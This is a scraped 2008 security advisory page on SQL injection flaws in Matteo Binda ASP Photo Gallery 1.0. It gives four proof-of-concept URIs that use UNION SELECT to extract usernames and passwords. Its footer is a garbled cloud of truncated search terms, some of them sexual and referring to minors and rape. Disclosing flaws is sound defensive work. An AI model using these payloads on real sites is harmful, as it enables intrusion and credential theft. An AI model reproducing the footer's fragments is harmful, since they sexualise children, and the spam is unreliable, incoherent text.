about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Matteo Binda ASP Photo Gallery Multiple SQL Injection Vulnerabilities


Title Matteo Binda ASP Photo Gallery Multiple SQL Injection Vulnerabilities
Published 2008-01-12-12:00AM
Updated 2008-01-14-09:48PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Ruben Ventura Pina is credited with the discovery of these vulnerabilities.
Vulnerable  Matteo Binda ASP Photo Gallery 1.0
Not Vulnerable  
Code  An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/Imgbig.asp?Id='union select user as name,1,pass as descrizione from stuff where '1'='1http://www.example.com/thumbricerca.asp?id=-1'union select user as name,1,pass as descrizione from stuff where 1 like http://www.example.com/thumbricerca.asp?ricerca=-1'union select user as name,1,pass as descrizione from stuff where 1 likhttp://www.example.com/thumb.asp?id=' union select user as name,1,pass as descrizione from stuff where '1'='1
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 21:59:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.kuo983 SEX.BDO.FL thersha Nice job, Pla bo raps trisha sex indian nud tamilbluef news for c Net agear Www.sexi89 kir 12years o Parnter Www.gangse raps novelku.cn 200 /compo WWW BOLLYW sexy .com hyip ip board 2 Www.fuckvi Sexpic.com animal invision Alg 985086 news for C Unix mod_g sql lite 200 /compo /component search/exp Hindi Sexy mirc 6.3 azrael Lara you porn 16 girl ra cat /home/ Hindi Sexy hot girl v maxcpm.inf eshop Crack Data http:/erob t447t Usasex.com